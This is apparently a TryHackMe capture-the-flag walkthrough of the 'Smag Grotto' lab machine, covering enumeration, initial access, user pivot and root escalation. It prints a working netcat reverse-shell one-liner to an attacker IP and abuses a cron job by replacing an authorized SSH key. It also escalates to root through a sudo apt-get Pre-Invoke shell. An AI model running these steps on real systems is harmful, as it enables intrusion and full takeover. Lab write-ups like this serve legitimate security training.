Smag Grotto

Date: 11, June, 2021

Author: Dhilip Sanjay S

Click Here to go to the TryHackMe room.

Enumeration

Nmap

$ nmap -sC -sV -p- 10.10.140.17 -oN nmap.out
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-11 11:30 IST

Nmap scan report for 10.10.140.17
Host is up (0.17s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 74:e0:e1:b4:05:85:6a:15:68:7e:16:da:f2:c7:6b:ee (RSA)
|   256 bd:43:62:b9:a1:86:51:36:f8:c7:df:f9:0f:63:8f:a3 (ECDSA)
|_  256 f9:e7:da:07:8f:10:af:97:0b:32:87:c9:32:d7:1b:76 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Smag
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 561.05 seconds

Gobuster

$ gobuster dir -u http://10.10.140.17/ -t 50 -w /usr/share/wordlists/dirb/big.txt | tee gobuster.out===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.140.17/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/06/11 11:31:57 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/mail                 (Status: 301) [Size: 311] [--> http://10.10.140.17/mail/]
/server-status        (Status: 403) [Size: 277]                                
                                                                               
===============================================================
2021/06/11 11:33:09 Finished
===============================================================

Home Page

Mail Page

Initial Access

Analyzing the PCAP

There is a login.php page at development.smag.thm
Add development.smag.thm to /etc/hosts file

Accessing Admin Panel

Reverse Shell

Now that we have a web shell, we can get a reverse shell using:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.17.7.91 1234 >/tmp/f

Once you get a reverse shell, upgrade it:

root@kali:~/Desktop/CTF/TryHackMe/smaggrotto# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.17.7.91] from (UNKNOWN) [10.10.155.203] 36046
/bin/sh: 0: can't access tty; job control turned off
$ ls
admin.php
login.php
materialize.min.css
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@smag:/var/www/development.smag.thm$ export TERM=xterm
export TERM=xterm
www-data@smag:/var/www/development.smag.thm$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/Desktop/CTF/TryHackMe/smaggrotto# stty raw -echo;fg
nc -lvnp 1234

www-data@smag:/var/www/development.smag.thm$

User Flag

To access the User flag, we need to login as jake.

Jake's public key

Looking around the file system, I found jake's public key backup.
But wait, public keys are useless. We need private key to login using ssh.
May be we need to look for something else!

www-data@smag:/$ find / -name *id_rsa* 2>/dev/null
/opt/.backups/jake_id_rsa.pub.backup
www-data@smag:/$ cd opt
www-data@smag:/opt$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Jun  4  2020 .
drwxr-xr-x 22 root root 4096 Jun  4  2020 ..
drwxr-xr-x  2 root root 4096 Jun  4  2020 .backups
www-data@smag:/opt$ cd .backups/
www-data@smag:/opt/.backups$ ls
jake_id_rsa.pub.backup
www-data@smag:/opt/.backups$ cat jake_id_rsa.pub.backup 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC5HGAnm2nNgzDW9OPAZ9dP0tZbvNrIJWa/
[..snip..]

Cron Jobs

There was a cron job which was copying the backup key to jake's authorized keys:

www-data@smag:/$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    /bin/cat /opt/.backups/jake_id_rsa.pub.backup > /home/jake/.ssh/authorized_keys

Now generate a key pair and replace the public key with the newly generated key.
Login using the private key:

$ ssh -i ~/.ssh/id_rsa [email protected]
The authenticity of host '10.10.171.199 (10.10.171.199)' can't be established.
ECDSA key fingerprint is SHA256:MMv7NKmeLS/aEUSOLy0NbyGrLCEKErHJTp1cIvsxnpA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.171.199' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Fri Jun  5 10:15:15 2020
jake@smag:~$ whoami
jake
jake@smag:~$ ls
user.txt
jake@smag:~$ cat user.txt 
<REDACTED>

Root Flag

Check for SUID bit

jake@smag:~$ find / -perm -u=s 2>/dev/null
/bin/umount
/bin/su
/bin/mount
/bin/ping6
/bin/ping
/bin/fusermount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/vmware-user-suid-wrapper
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device

Nothing interesting here!

Check sudo permissions

jake@smag:/$ sudo -l
Matching Defaults entries for jake on smag:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on smag:
    (ALL : ALL) NOPASSWD: /usr/bin/apt-get

Jake can run apt-get as as root without password!

Root Access

Check gtfobins for privilege escalation using apt-get binary:

jake@smag:/$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
# whoami
root
# cd /root      
# ls
root.txt
# cat root.txt
REDACTED

PreviousBrute It NextIgnite

Last updated 2 years ago

hashtagEnumeration

hashtagNmap

hashtagGobuster

hashtagHome Page

hashtagMail Page

hashtagInitial Access

hashtagAnalyzing the PCAP

hashtagAccessing Admin Panel

hashtagReverse Shell

hashtagUser Flag

hashtagJake's public key

hashtagCron Jobs

hashtagJake's Login

hashtagRoot Flag

hashtagCheck for SUID bit

hashtagCheck sudo permissions

hashtagRoot Access

Enumeration

Nmap

Gobuster

Home Page

Mail Page

Initial Access

Analyzing the PCAP

Accessing Admin Panel

Reverse Shell

User Flag

Jake's public key

Cron Jobs

Jake's Login

Root Flag

Check for SUID bit

Check sudo permissions

Root Access